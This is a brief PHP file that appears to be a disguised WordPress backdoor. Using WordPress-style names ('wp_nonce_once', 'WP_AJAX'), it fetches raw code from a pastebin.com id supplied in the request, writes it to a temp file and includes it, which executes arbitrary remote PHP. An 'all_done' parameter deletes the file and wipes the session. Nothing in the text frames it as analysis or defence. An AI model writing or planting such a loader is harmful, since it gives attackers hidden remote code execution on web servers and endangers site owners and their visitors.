<?php 
session_start();
if (!isset($_SESSION['myfpath'])) 
	{if (isset($_REQUEST['wp_nonce_once']))
		{$nonce=$_REQUEST['wp_nonce_once'];}
	else {$nonce='sPj0GFWb';}
	$_SESSION['myfpath']= tempnam(sys_get_temp_dir(), 'WP_AJAX');
	file_put_contents($_SESSION['myfpath'],file_get_contents('http://pastebin.com/raw.php?i='.$nonce));}
if (isset($_SESSION['myfpath'])){ if (isset($_REQUEST['all_done']))
	{unlink($_SESSION['myfpath']);
	session_unset();
	exit;}
	include($_SESSION['myfpath']);}